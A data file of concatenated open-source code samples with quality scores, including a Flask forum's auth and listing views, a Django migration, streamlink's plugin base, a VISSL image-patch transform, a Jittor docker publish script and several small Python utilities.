existing_user = db.users.find_one({'username' :
request.form['username']})
if existing_user:
error = 'Username already exists'
else:
new_user = {'username' : request.form['username'],
'email' : request.form['email'],
'zip' : request.form['zip'],
'password' : generate_password_hash(request.form['password'])}
db.users.insert_one(new_user)
user = db.users.find_one({'username': request.form['username']})
pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username'])
pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True, ttl=0)
return redirect(url_for('dashboard.dashboard'))
return render_template('auth/signup.html', form=form,
title='Sign Up for Hydrosmart', error=error)
# @mod_auth.route('/googlelogin', methods=['GET', 'POST'])
@mod_auth.route("/logout")
@login_required
def logout():
logout_user()
flash("Logged out.")
return redirect('/login')
@login_manager.unauthorized_handler
def unauthorized_callback():
return redirect('/login')
@login_manager.user_loader
def load_user(username):
u = db.users.find_one({'username': username})
if not u:
return None
return User(u['username'])
def callback(message, channel):
db.data.insert_one(message)
def error(message):
db.data.insert_one(message)
| 2.265625 | 2 |
economist/migrations/0003_auto_20170406_1402.py | xingjianpan/news_reader_backend | 1 | 1270 | <filename>economist/migrations/0003_auto_20170406_1402.py
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-06 06:02
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('economist', '0002_auto_20170406_1153'),
]
operations = [
migrations.AlterField(
model_name='article',
name='alternativename',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='article',
name='category',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='article',
name='fly_title',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='article',
name='headline',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='article',
name='project',
field=models.TextField(editable=False),
),
migrations.AlterField(
model_name='article',
name='source',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='article',
name='source_url',
field=models.URLField(editable=False),
),
migrations.AlterField(
model_name='article',
name='spider',
field=models.TextField(editable=False),
),
]
| 1.640625 | 2 |
test/test_ethereum.py | coinplus-sa/coinplus-solo | 1 | 1271 | import unittest
from coinplus_solo_redeem.common import wif_export_bitcoin, compute_public_key_sec256k1, address_from_publickey_ethereum
class TestEthereum(unittest.TestCase):
"""test of the bitcoin conversion from private key to wif"""
def setUp(self):
self.test_add_vector = [("03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa", "<KEY>"),
("<KEY>", "0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97"),
("<KEY>", "<KEY>"),
("<KEY>", "<KEY>"),
("037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88", "0x0af4DbEf58063AEd75e6fF57610348E55954E8FB"),
("0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b", "<KEY>"),
("0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5", "<KEY>"),
("028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a", "0x98447B7aC721BDeb197a7e72780f6f41BECA2919"),
("0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651", "0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4"),
("<KEY>", "<KEY>")]
def test_address_testvector(self):
for publickey_hex, address_expected in self.test_add_vector:
publickey = bytearray.fromhex(publickey_hex)
address = address_from_publickey_ethereum(publickey)
self.assertEqual(address, address_expected)
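# Standard unittest entry point (added so the module can be run directly; this is
# conventional boilerplate rather than part of the original file).
if __name__ == '__main__':
    unittest.main()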
| 2.65625 | 3 |
python97/chapter05/list_gen.py | youaresherlock/PythonPractice | 0 | 1272 | #!usr/bin/python
# -*- coding:utf8 -*-
# List generation expressions (list comprehensions)
# 1. Extract the odd numbers between 1 and 20
# odd_list = []
# for i in range(21):
# if i % 2 == 1:
# odd_list.append(i)
# odd_list = [i for i in range(21) if i % 2 == 1]
# print(odd_list)
# 2. A case with more complex logic: if the number is odd, square it
# List comprehensions perform better than building a list with append
def handle_item(item):
return item * item
odd_list = [handle_item(i) for i in range(21) if i % 2 == 1]
print(odd_list)
# Generator expression
odd_gen = (i for i in range(21) if i % 2 == 1)
print(type(odd_gen))
for item in odd_gen:
print(item)
# Dict comprehension
my_dict = {"bobby1": 22, "bobby2": 23, "imooc.com": 5}
reversed_dict = {value:key for key, value in my_dict.items()}
print(reversed_dict)
# Set comprehension
my_set = set(my_dict.keys())
my_set = {key for key, value in my_dict.items()}
print(type(my_set))
| 4.0625 | 4 |
src/streamlink/plugin/plugin.py | isqad/streamlink | 1 | 1273 | import ast
import operator
import re
from collections import OrderedDict
from functools import partial
from ..cache import Cache
from ..exceptions import PluginError, NoStreamsError
from ..options import Options
# FIXME: This is a crude attempt at making a bitrate's
# weight end up similar to the weight of a resolution.
# Someone who knows math, please fix.
BIT_RATE_WEIGHT_RATIO = 2.8
ALT_WEIGHT_MOD = 0.01
QUALITY_WEIGTHS_EXTRA = {
"other": {
"live": 1080,
},
"tv": {
"hd": 1080,
"sd": 576,
},
"quality": {
"ehq": 720,
"hq": 576,
"sq": 360,
},
}
FILTER_OPERATORS = {
"<": operator.lt,
"<=": operator.le,
">": operator.gt,
">=": operator.ge,
}
PARAMS_REGEX = r"(\w+)=({.+?}|\[.+?\]|\(.+?\)|'(?:[^'\\]|\\')*'|\"(?:[^\"\\]|\\\")*\"|\S+)"
HIGH_PRIORITY = 30
NORMAL_PRIORITY = 20
LOW_PRIORITY = 10
NO_PRIORITY = 0
def stream_weight(stream):
for group, weights in QUALITY_WEIGTHS_EXTRA.items():
if stream in weights:
return weights[stream], group
match = re.match(r"^(\d+)(k|p)?(\d+)?(\+)?(?:_(\d+)k)?(?:_(alt)(\d)?)?$", stream)
if match:
weight = 0
if match.group(6):
if match.group(7):
weight -= ALT_WEIGHT_MOD * int(match.group(7))
else:
weight -= ALT_WEIGHT_MOD
name_type = match.group(2)
if name_type == "k": # bit rate
bitrate = int(match.group(1))
weight += bitrate / BIT_RATE_WEIGHT_RATIO
return weight, "bitrate"
elif name_type == "p": # resolution
weight += int(match.group(1))
if match.group(3): # fps eg. 60p or 50p
weight += int(match.group(3))
if match.group(4) == "+":
weight += 1
if match.group(5): # bit rate classifier for resolution
weight += int(match.group(5)) / BIT_RATE_WEIGHT_RATIO
return weight, "pixels"
return 0, "none"
def iterate_streams(streams):
for name, stream in streams:
if isinstance(stream, list):
for sub_stream in stream:
yield (name, sub_stream)
else:
yield (name, stream)
def stream_type_priority(stream_types, stream):
stream_type = type(stream[1]).shortname()
try:
prio = stream_types.index(stream_type)
except ValueError:
try:
prio = stream_types.index("*")
except ValueError:
prio = 99
return prio
def stream_sorting_filter(expr, stream_weight):
match = re.match(r"(?P<op><=|>=|<|>)?(?P<value>[\w+]+)", expr)
if not match:
raise PluginError("Invalid filter expression: {0}".format(expr))
op, value = match.group("op", "value")
op = FILTER_OPERATORS.get(op, operator.eq)
filter_weight, filter_group = stream_weight(value)
def func(quality):
weight, group = stream_weight(quality)
if group == filter_group:
return not op(weight, filter_weight)
return True
return func
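# Illustrative sketch of a sorting-exclude expression: ">480p" builds a predicate
# that rejects streams ranked strictly above 480p, comparing only within the same
# weight group ("pixels" here), e.g.
#   keep = stream_sorting_filter(">480p", stream_weight)
#   keep("720p")  # -> False (excluded from the best/worst ranking)
#   keep("360p")  # -> True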
def parse_url_params(url):
split = url.split(" ", 1)
url = split[0]
params = split[1] if len(split) > 1 else ''
return url, parse_params(params)
def parse_params(params):
rval = {}
matches = re.findall(PARAMS_REGEX, params)
for key, value in matches:
try:
value = ast.literal_eval(value)
except Exception:
pass
rval[key] = value
return rval
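# Illustrative sketch of the URL-parameter convention handled above: everything
# after the first space is parsed as key=value pairs, with values passed through
# ast.literal_eval when possible, e.g.
#   parse_url_params("http://example.com/stream verify=False quality='720p'")
#   # -> ("http://example.com/stream", {"verify": False, "quality": "720p"})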
class Plugin(object):
"""A plugin can retrieve stream information from the URL specified.
:param url: URL that the plugin will operate on
"""
cache = None
logger = None
module = "unknown"
options = Options()
session = None
@classmethod
def bind(cls, session, module):
cls.cache = Cache(filename="plugin-cache.json",
key_prefix=module)
cls.logger = session.logger.new_module("plugin." + module)
cls.module = module
cls.session = session
def __init__(self, url):
self.url = url
@classmethod
def can_handle_url(cls, url):
raise NotImplementedError
@classmethod
def set_option(cls, key, value):
cls.options.set(key, value)
@classmethod
def get_option(cls, key):
return cls.options.get(key)
@classmethod
def stream_weight(cls, stream):
return stream_weight(stream)
@classmethod
def default_stream_types(cls, streams):
stream_types = ["rtmp", "hls", "hds", "http"]
for name, stream in iterate_streams(streams):
stream_type = type(stream).shortname()
if stream_type not in stream_types:
stream_types.append(stream_type)
return stream_types
@classmethod
def broken(cls, issue=None):
def func(*args, **kwargs):
msg = (
"This plugin has been marked as broken. This is likely due to "
"changes to the service preventing a working implementation. "
)
if issue:
msg += "More info: https://github.com/streamlink/streamlink/issues/{0}".format(issue)
raise PluginError(msg)
def decorator(*args, **kwargs):
return func
return decorator
@classmethod
def priority(cls, url):
"""
Return the plugin priority for a given URL, by default it returns
NORMAL priority.
:return: priority level
"""
return NORMAL_PRIORITY
def streams(self, stream_types=None, sorting_excludes=None):
"""Attempts to extract available streams.
Returns a :class:`dict` containing the streams, where the key is
the name of the stream, most commonly the quality and the value
is a :class:`Stream` object.
The result can contain the synonyms **best** and **worst** which
points to the streams which are likely to be of highest and
lowest quality respectively.
If multiple streams with the same name are found, the order of
streams specified in *stream_types* will determine which stream
gets to keep the name while the rest will be renamed to
"<name>_<stream type>".
The synonyms can be fine tuned with the *sorting_excludes*
parameter. This can be either of these types:
- A list of filter expressions in the format
*[operator]<value>*. For example the filter ">480p" will
exclude streams ranked higher than "480p" from the list
used in the synonyms ranking. Valid operators are >, >=, <
and <=. If no operator is specified then equality will be
tested.
- A function that is passed to filter() with a list of
stream names as input.
:param stream_types: A list of stream types to return.
:param sorting_excludes: Specify which streams to exclude from
the best/worst synonyms.
.. versionchanged:: 1.4.2
Added *priority* parameter.
.. versionchanged:: 1.5.0
Renamed *priority* to *stream_types* and changed behaviour
slightly.
.. versionchanged:: 1.5.0
Added *sorting_excludes* parameter.
.. versionchanged:: 1.6.0
*sorting_excludes* can now be a list of filter expressions
or a function that is passed to filter().
"""
try:
ostreams = self._get_streams()
if isinstance(ostreams, dict):
ostreams = ostreams.items()
# Flatten the iterator to a list so we can reuse it.
if ostreams:
ostreams = list(ostreams)
except NoStreamsError:
return {}
except (IOError, OSError, ValueError) as err:
raise PluginError(err)
if not ostreams:
return {}
if stream_types is None:
stream_types = self.default_stream_types(ostreams)
# Add streams depending on stream type and priorities
sorted_streams = sorted(iterate_streams(ostreams),
key=partial(stream_type_priority,
stream_types))
streams = {}
for name, stream in sorted_streams:
stream_type = type(stream).shortname()
# Use * as wildcard to match other stream types
if "*" not in stream_types and stream_type not in stream_types:
continue
# drop _alt from any stream names
if name.endswith("_alt"):
name = name[:-len("_alt")]
existing = streams.get(name)
if existing:
existing_stream_type = type(existing).shortname()
if existing_stream_type != stream_type:
name = "{0}_{1}".format(name, stream_type)
if name in streams:
name = "{0}_alt".format(name)
num_alts = len(list(filter(lambda n: n.startswith(name), streams.keys())))
# We shouldn't need more than 2 alt streams
if num_alts >= 2:
continue
elif num_alts > 0:
name = "{0}{1}".format(name, num_alts + 1)
# Validate stream name and discard the stream if it's bad.
match = re.match("([A-z0-9_+]+)", name)
if match:
name = match.group(1)
else:
self.logger.debug("The stream '{0}' has been ignored "
"since it is badly named.", name)
continue
# Force lowercase name and replace space with underscore.
streams[name.lower()] = stream
        # Create the best/worst synonyms
def stream_weight_only(s):
return (self.stream_weight(s)[0] or
(len(streams) == 1 and 1))
stream_names = filter(stream_weight_only, streams.keys())
sorted_streams = sorted(stream_names, key=stream_weight_only)
if isinstance(sorting_excludes, list):
for expr in sorting_excludes:
filter_func = stream_sorting_filter(expr, self.stream_weight)
sorted_streams = list(filter(filter_func, sorted_streams))
elif callable(sorting_excludes):
sorted_streams = list(filter(sorting_excludes, sorted_streams))
final_sorted_streams = OrderedDict()
for stream_name in sorted(streams, key=stream_weight_only):
final_sorted_streams[stream_name] = streams[stream_name]
if len(sorted_streams) > 0:
best = sorted_streams[-1]
worst = sorted_streams[0]
final_sorted_streams["worst"] = streams[worst]
final_sorted_streams["best"] = streams[best]
return final_sorted_streams
def get_streams(self, *args, **kwargs):
"""Deprecated since version 1.9.0.
Has been renamed to :func:`Plugin.streams`, this is an alias
for backwards compatibility.
"""
return self.streams(*args, **kwargs)
def _get_streams(self):
raise NotImplementedError
__all__ = ["Plugin"]
| 2.40625 | 2 |
tests/cli/conftest.py | Aahbree/reference-data-repository | 0 | 1274 | # This file is part of the Reference Data Repository (refdata).
#
# Copyright (C) 2021 New York University.
#
# refdata is free software; you can redistribute it and/or modify it under the
# terms of the MIT License; see LICENSE file for more details.
"""Fixtures for testing the command-line interface."""
import os
import pytest
from click.testing import CliRunner
from refdata.db import DB
import refdata.config as config
@pytest.fixture
def refdata_cli(tmpdir):
"""Initialize the environment and the database for the local store."""
basedir = os.path.abspath(str(tmpdir))
connect_url = 'sqlite:///{}'.format(os.path.join(basedir, 'test.db'))
DB(connect_url=connect_url).init()
os.environ[config.ENV_BASEDIR] = basedir
os.environ[config.ENV_URL] = connect_url
# Make sure to reset the database.
yield CliRunner()
# Clear environment variables that were set for the test runner.
del os.environ[config.ENV_BASEDIR]
del os.environ[config.ENV_URL]
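# Hypothetical usage sketch (the CLI entry-point name below is an assumption):
# a test requests the fixture and drives the CLI through the returned CliRunner.
#   def test_list_datasets(refdata_cli):
#       result = refdata_cli.invoke(cli, ['list'])
#       assert result.exit_code == 0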
| 1.953125 | 2 |
swav/vissl/vissl/data/ssl_transforms/img_patches_tensor.py | lhoestq/DeDLOC | 0 | 1275 | <filename>swav/vissl/vissl/data/ssl_transforms/img_patches_tensor.py
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import logging
import math
from typing import Any, Dict
import numpy as np
from classy_vision.dataset.transforms import register_transform
from classy_vision.dataset.transforms.classy_transform import ClassyTransform
@register_transform("ImgPatchesFromTensor")
class ImgPatchesFromTensor(ClassyTransform):
"""
Create image patches from a torch Tensor or numpy array.
This transform was proposed in Jigsaw - https://arxiv.org/abs/1603.09246
Args:
num_patches (int): how many image patches to create
patch_jitter (int): space to leave between patches
"""
def __init__(self, num_patches=9, patch_jitter=21):
self.num_patches = num_patches
self.patch_jitter = patch_jitter
assert self.patch_jitter > 0, "Negative jitter not supported"
self.grid_side_len = int(math.sqrt(self.num_patches)) # usually = 3
logging.info(
f"ImgPatchesFromTensor: num_patches: {num_patches} "
f"patch_jitter: {patch_jitter}"
)
def __call__(self, image):
"""
Input image which is a torch.Tensor object of shape 3 x H x W
"""
data = []
grid_size = int(image.shape[1] / self.grid_side_len)
patch_size = grid_size - self.patch_jitter
jitter = np.random.randint(
0, self.patch_jitter, (2, self.grid_side_len, self.grid_side_len)
)
for i in range(self.grid_side_len):
for j in range(self.grid_side_len):
x_offset = i * grid_size
y_offset = j * grid_size
grid_cell = image[
:, y_offset : y_offset + grid_size, x_offset : x_offset + grid_size
]
patch = grid_cell[
:,
jitter[1, i, j] : jitter[1, i, j] + patch_size,
jitter[0, i, j] : jitter[0, i, j] + patch_size,
]
assert patch.shape[1] == patch_size, "Image not cropped properly"
assert patch.shape[2] == patch_size, "Image not cropped properly"
# copy patch data so that all patches are different in underlying memory
data.append(np.copy(patch))
return data
@classmethod
def from_config(cls, config: Dict[str, Any]) -> "ImgPatchesFromTensor":
"""
Instantiates ImgPatchesFromTensor from configuration.
Args:
config (Dict): arguments for for the transform
Returns:
ImgPatchesFromTensor instance.
"""
num_patches = config.get("num_patches", 9)
patch_jitter = config.get("patch_jitter", 21)
logging.info(f"ImgPatchesFromTensor | Using num_patches: {num_patches}")
logging.info(f"ImgPatchesFromTensor | Using patch_jitter: {patch_jitter}")
return cls(num_patches=num_patches, patch_jitter=patch_jitter)
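# Illustrative usage sketch: for a 3 x 255 x 255 input tensor, grid_size is
# 255 // 3 = 85 and patch_size is 85 - 21 = 64, so the transform returns a list
# of nine 3 x 64 x 64 numpy arrays.
#   transform = ImgPatchesFromTensor.from_config({"num_patches": 9, "patch_jitter": 21})
#   patches = transform(image)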
| 2.3125 | 2 |
python/jittor/utils/publish.py | Jittor/Jittor | 4 | 1276 | #!/usr/bin/python3
# ***************************************************************
# Copyright (c) 2022 Jittor. All Rights Reserved.
# Maintainers:
# <NAME> <<EMAIL>>.
#
# This file is subject to the terms and conditions defined in
# file 'LICENSE.txt', which is part of this source code package.
# ***************************************************************
# Publish steps:
# 1. build,push,upload docker image[jittor/jittor]
# 2. build,push,upload docker image[jittor/jittor-cuda]
# upload to pip:
# rm -rf dist && python3.7 ./setup.py sdist && python3.7 -m twine upload dist/*
import os
def run_cmd(cmd):
print("[run cmd]", cmd)
assert os.system(cmd) == 0
def upload_file(path):
run_cmd(f"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/")
def docker_task(name, build_cmd):
run_cmd(build_cmd)
run_cmd(f"sudo docker push {name}")
bname = os.path.basename(name)
run_cmd(f"sudo docker save {name}:latest -o /tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz")
upload_file(f"/tmp/{bname}.tgz")
docker_task(
"jittor/jittor-cuda-11-1",
"sudo docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network host"
)
docker_task(
"jittor/jittor",
"sudo docker build --tag jittor/jittor:latest . --network host"
)
docker_task(
"jittor/jittor-cuda",
"sudo docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host"
)
docker_task(
"jittor/jittor-cuda-10-1",
"sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network host"
)
run_cmd("ssh jittor-web Documents/jittor-blog.git/hooks/post-update") | 1.882813 | 2 |
prodapt_solutions/config/cliargs.py | DineshDevaraj/interview_answers | 0 | 1277 | <gh_stars>0
import argparse
from helper.metaclasses_definition import Singleton
class CliArgs(metaclass=Singleton):
LogLevel = None
BankName = None
InputFilepath = None
@staticmethod
def init():
my_parser = argparse.ArgumentParser()
my_parser.add_argument('--bank-name', required=True)
my_parser.add_argument('--input-filepath')
my_parser.add_argument('--log-level')
args = my_parser.parse_args()
CliArgs.BankName = args.bank_name
CliArgs.InputFilepath = args.input_filepath
CliArgs.LogLevel = args.log_level
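# Hypothetical usage sketch (the entry-point module name is an assumption):
# after starting the process with, for example,
#   python main.py --bank-name hdfc --input-filepath data.csv
# a single CliArgs.init() call parses the arguments once, and the Singleton
# metaclass keeps the parsed values globally available as CliArgs.BankName etc.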
| 2.515625 | 3 |
plugins/flytekit-papermill/setup.py | TeoZosa/flytekit | 0 | 1278 | from setuptools import setup
PLUGIN_NAME = "papermill"
microlib_name = f"flytekitplugins-{PLUGIN_NAME}"
plugin_requires = [
"flytekit>=0.16.0b0,<1.0.0",
"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0",
"papermill>=1.2.0",
"nbconvert>=6.0.7",
"ipykernel>=5.0.0",
]
__version__ = "0.0.0+develop"
setup(
name=microlib_name,
version=__version__,
author="flyteorg",
author_email="<EMAIL>",
description="This is the flytekit papermill plugin",
namespace_packages=["flytekitplugins"],
packages=[f"flytekitplugins.{PLUGIN_NAME}"],
install_requires=plugin_requires,
license="apache2",
python_requires=">=3.7",
classifiers=[
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
],
)
| 1.304688 | 1 |
2017/third.py | vla3089/adventofcode | 0 | 1279 | #!/usr/bin/env python
input = 368078
size = 1
s_size = size * size # squared size
while (s_size < input):
size += 2
s_size = size * size
bottom_right = s_size
bottom_left = s_size - size + 1
top_left = s_size - 2 * size + 2
top_right = s_size - 3 * size + 3
input_x = -1
input_y = -1
# bottom horizontal line
if (input > bottom_left):
input_x = size - 1
input_y = input - bottom_left
elif (input > top_left):
input_y = input - top_left
input_x = 0
elif (input > top_right):
input_x = 0
input_y = size - input + top_right - 1
else:
input_x = top_right - input
input_y = size - 1
ap_x = size / 2
ap_y = ap_x
print abs(ap_x - input_x) + abs(ap_y - input_y)
| 3.21875 | 3 |
racer/methods/genetic_programming/parameterized.py | max-eth/racer | 1 | 1280 | <filename>racer/methods/genetic_programming/parameterized.py<gh_stars>1-10
import copy
import numpy as np
from racer.utils import load_pickle
from racer.methods.genetic_programming.program_tree import ProgramTree
class ParameterizedTree(ProgramTree):
# This makes the assumption that all children of the underlying tree are in a field .children and that the underlying tree has the field .name
def __init__(self, underlying_tree, init_fct=None, _copy=True):
if _copy:
underlying_tree = copy.deepcopy(underlying_tree) # safety first
if hasattr(underlying_tree, "children"):
underlying_tree.children = [
ParameterizedTree(underlying_tree=child, _copy=False)
for child in underlying_tree.children
]
self.underlying_tree = underlying_tree
if init_fct is None:
self.set_params([1, 0])
else:
self.set_params(init_fct())
def set_params(self, params):
self.weight, self.bias = params
self.name = self.underlying_tree.name + " * {} + {}".format(
self.weight, self.bias
)
def get_params(self):
return [self.weight, self.bias]
def __call__(self, *x):
return self.underlying_tree(*x) * self.weight + self.bias
def __len__(self):
return len(self.underlying_tree)
def display(self, prefix):
res = prefix + self.name + "\n"
if hasattr(self.underlying_tree, "children"):
for child in self.underlying_tree.children:
res += child.display(prefix=" " + prefix)
return res
def _set_dirty(self):
raise Exception("Parameterized trees should not be mutated")
def in_order(self):
yield self
if hasattr(self.underlying_tree, "children"):
for child in self.underlying_tree.children:
for node in child.in_order():
yield node
class ParameterizedIndividual:
def __init__(self, parameterized_trees):
self.parameterized_trees = parameterized_trees
@staticmethod
def from_individual(ind):
return ParameterizedIndividual(
parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees]
)
@staticmethod
def from_pickled_individual(fname):
return ParameterizedIndividual.from_individual(load_pickle(fname))
def __call__(self, *x):
return [tree(*x) for tree in self.parameterized_trees]
def __len__(self):
return sum(len(tree) for tree in self.parameterized_trees)
def set_flat_parameters(self, params):
n_used = 0
for tree in self.parameterized_trees:
for node in tree.in_order():
node.set_params(list(params[n_used : n_used + 2]))
n_used += 2
def get_flat_parameters(self):
params = []
for tree in self.parameterized_trees:
for node in tree.in_order():
params += node.get_params()
return np.array(params)
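# Illustrative behavioural sketch (uses a hypothetical stand-in for a real GP
# tree node): every wrapped node rescales its output as weight * f(x) + bias.
#   class _ConstLeaf:                      # hypothetical leaf with no .children
#       name = "x0"
#       def __call__(self, *x): return x[0]
#       def __len__(self): return 1
#   node = ParameterizedTree(_ConstLeaf())
#   node.set_params([2.0, 0.5])
#   node(3.0)                              # -> 3.0 * 2.0 + 0.5 = 6.5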
| 2.609375 | 3 |
base/frontends/views.py | danielecook/upvote.pub | 1 | 1281 | <reponame>danielecook/upvote.pub
# -*- coding: utf-8 -*-
"""
"""
import os
import markdown2
from flask import (Blueprint,
request,
render_template,
flash, g,
session,
redirect,
url_for,
abort,
Markup)
from werkzeug import check_password_hash, generate_password_hash
from logzero import logger
from base import db, app
from base import search as search_module # don't override function name
from base.users.forms import RegisterForm, LoginForm
from base.users.models import User
from base.threads.models import Thread, Publication
from base.subreddits.models import Subreddit
from base.users.decorators import requires_login
from base.utils.user_utils import get_school
from base.subreddits.forms import subreddit_subs, sub_form
from base.utils.email import send_email
from base.utils.misc import random_string, validate_sort_type
mod = Blueprint('frontends', __name__, url_prefix='')
@mod.before_request
def before_request():
g.user = None
if session.get('user_id'):
g.user = User.query.get(session['user_id'])
def home_subreddit():
logger.info(g.user)
if g.get('user'):
subreddit_subs = g.user.subreddit_subs.get('subs')
subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \
.filter(Subreddit.name.in_(subreddit_subs))
else:
subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness))
return subs
def get_subreddits():
"""
Fetch user subreddits otherwise fetch a list of defaults
"""
if g.get('user'):
subreddit_subs = g.user.subreddit_subs.get('subs')
subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs))
else:
# Default set of subreddits
subreddits = Subreddit.query.all()
return subreddits
def process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'):
"""
abstracted because many sources pull from a thread listing
source (subreddit permalink, homepage, etc)
"""
threads_per_page = 15
cur_page = request.args.get('page') or 1
cur_page = int(cur_page)
thread_paginator = None
# if we are passing in a resultset, that means we are just looking to
# quickly paginate some arbitrary data, no sorting
if rs:
thread_paginator = rs.paginate(cur_page,
per_page=threads_per_page,
error_out=True)
return thread_paginator
# sexy line of code :)
base_query = subreddit.threads if subreddit else Thread.query
# Filter by user subs
logger.info(g.user)
if g.user:
subreddit_subs = g.user.subreddit_subs.get('subs')
base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs))
# Sorting
if sort_type == 'hot':
base_query = base_query.order_by(db.desc(Thread.hotness))
elif sort_type == 'top':
base_query = base_query.order_by(db.desc(Thread.votes))
elif sort_type == 'comments':
base_query = base_query.order_by(db.desc(Thread.n_comments))
elif sort_type == 'new':
base_query = base_query.order_by(db.desc(Thread.created_on))
elif sort_type == 'publication_date':
base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date))
thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page, error_out=True)
return thread_paginator
@mod.route('/')
def home(sort_type='hot'):
"""
If not trending we order by creation date
"""
atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True)
trending = True if request.path.endswith('trending') else False
page_title = "Trending" if trending else "Frontpage"
thread_paginator = process_thread_paginator(trending=trending)
return render_template('home.html',
atom_url=atom_url,
page_title=page_title,
cur_subreddit=home_subreddit(),
thread_paginator=thread_paginator)
@mod.route('/.atom')
@mod.route('/.xml')
@mod.route('/.rss')
def atom_redirect():
return redirect(url_for("subreddits.atom_feed", subreddit_name="frontpage"))
@mod.route('/h/<string:page>')
def render_markdown(page):
page_md = f"base/markdown/{page}.md"
if not os.path.exists(page_md):
abort(404)
with open(page_md, 'r') as f:
content = f.read()
md = markdown2.markdown(content,
extras = ['fenced-code-blocks',
'nofollow',
'target-blank-links',
'toc',
'tables',
'footnotes',
'metadata',
'markdown-in-html'])
return render_template('markdown.html',
page=md,
**md.metadata)
@mod.route('/search/', methods=['GET'])
def search():
"""
Allows users to search threads and comments
"""
query = request.args.get('query')
page_title=f"Search results for '{query}'"
rs = search_module.search(query, orderby='creation', search_title=True,
search_text=True)
thread_paginator = process_thread_paginator(rs=rs)
#rs = rs.all()
num_searches = rs.count()
subreddits = get_subreddits()
return render_template('home.html',
page_title=page_title,
cur_subreddit=home_subreddit(),
thread_paginator=thread_paginator,
num_searches=num_searches)
@mod.route('/login/', methods=['GET', 'POST'])
def login():
"""
We had to do some extra work to route the user back to
his or her original place before logging in
"""
if g.user:
return redirect(url_for('frontends.home'))
next = ''
if request.method == 'GET':
if 'next' in request.args:
next = request.args['next']
form = LoginForm(request.form)
# make sure data is valid, but doesn't validate password is right
if form.validate_on_submit():
# continue where we left off if so
user = User.query.filter_by(email=form.email.data).first()
# we use werzeug to validate user's password
if user and check_password_hash(user.password, form.password.data):
# the session can't be modified as it's signed,
# it's a safe place to store the user id
session['user_id'] = user.id
if 'next' in request.form and request.form['next']:
return redirect(request.form['next'])
return redirect(url_for('frontends.home'))
flash('Wrong email or password', 'danger')
return render_template("login.html", form=form, next=next)
@mod.route('/logout/', methods=['GET', 'POST'])
@requires_login
def logout():
session.pop('user_id', None)
return redirect(url_for('frontends.home'))
@mod.route('/confirm-email/<string:token>')
def confirm_email(token):
"""
Confirm user email
"""
user = User.query.filter_by(email_token=token).first()
if user.email_token == token:
user.email_verified = True
db.session.commit()
flash("Thank you for confirming your email! You can now submit and comment.", 'success')
return redirect(url_for('frontends.home'))
@mod.route('/register/', methods=['GET', 'POST'])
def register():
"""
Registration page
"""
if g.user:
# If the user is logged in send them home
return redirect(url_for('frontends.home'))
next = ''
if request.method == 'GET':
if 'next' in request.args:
next = request.args['next']
form = RegisterForm(request.form)
if form.validate_on_submit():
# create an user instance not yet stored in the database
user = User(username=form.username.data,
email=form.email.data, \
password=generate_password_hash(form.password.data),
university=get_school(form.email.data),
email_token=random_string())
# Insert the record in our database and commit it
db.session.add(user)
email_confirm_link = url_for('frontends.confirm_email', token = user.email_token)
email_response = send_email("Confirm upvote.pub email",
"""Please visit the link below to confirm your email:\n\n{}{}""".format(request.url_root.strip("/"), email_confirm_link),
user.email)
# Log the user in, as he now has an id
db.session.commit()
session['user_id'] = user.id
flash('Thanks for signing up! Please confirm your email by following the link sent in the confirmation email.', 'success')
if 'next' in request.form and request.form['next']:
return redirect(request.form['next'])
return redirect(url_for('frontends.home'))
return render_template("register.html", form=form, next=next)
@mod.route('/subs/', methods=['GET', 'POST'])
def view_all():
"""
"""
subreddit_list = Subreddit.query.all()
form = None
if g.user:
if request.form:
form = subreddit_subs(request.form)
if form.validate_on_submit():
form_subs = form.data.get('subs')
form_subs = list(set([x['sub_name'] for x in form_subs if x['value']]))
g.user.subreddit_subs = {'subs': form_subs}
flash("Updated Subs", 'success')
db.session.commit()
else:
form = subreddit_subs()
